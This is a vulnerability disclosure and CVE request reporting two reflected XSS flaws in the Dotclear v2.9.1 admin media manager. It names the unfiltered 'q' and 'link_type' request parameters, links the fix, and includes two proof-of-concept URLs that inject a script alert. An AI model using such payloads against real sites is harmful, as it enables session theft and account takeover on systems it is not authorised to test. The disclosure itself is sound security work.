CVE request: XSS vulns in Dotclear v2.9.1

[陈瑞琦 <chenruiqi () 360 cn>]

I found some XSS vulns in Dotclear v2.9.1

Title: XSS vulns in Dotclear v2.9.1
Author: Chen Ruiqi, Chenruiqi () 360 cn
Date: 2016-08-01
Download Site: https://dotclear.org/download
Vendor: dotclear.org
Vendor Notified: 2016-08-01
Vendor Contact: security () dotclear net
--------------------------------------------------------------------------------------------------------
Discription:
Dotclear is an open source blog publishing application distributed under the GNU GPLv2. Developed originally by Olivier 
Meunier from 2002, Dotclear has now attracted a solid team of developers.[2] It is relatively popular in French 
speaking countries, where it is used by several major blogging platforms (Gandi Blogs,[3] Marine nationale,[4] 
etc.).(Wiki)
-----------------------------------------------------------------------------------------------------------
Vulnerability:
There are two reflected XSS vulns in Dotclear v2.9.1 media manager

/admin/media.php
line 34 $link_type = !empty($_REQUEST['link_type']) ? $_REQUEST['link_type'] : null;
line 62 $q = isset($_REQUEST['q']) ? $_REQUEST['q'] : null;

Lack of filter before put the user-input into the page.
--------------------------------------------------------------------------------------------------------
PoC Code:
http://*.*.*.*/dotclear/admin/media.php?q=77777%3C%2Fspan%3E%3Cscript%3Ealert(1)%3C/script%3E&popup=0&select=0&plugin_id=&post_id=&link_type=
http://*.*.*.*/dotclear/admin/media.php?q=77777&popup=0&select=0&plugin_id=&post_id=&link_type=8888%22%3E%3Cscript%3Ealert(1)%3C/script%3E
----------------------------------------------------------------------------------------------------------
Fix Code:
https://hg.dotclear.org/dotclear/rev/40d0207e520d


Could you assign CVE id for those?

Thank you

Chen Ruiqi
Codesafe Team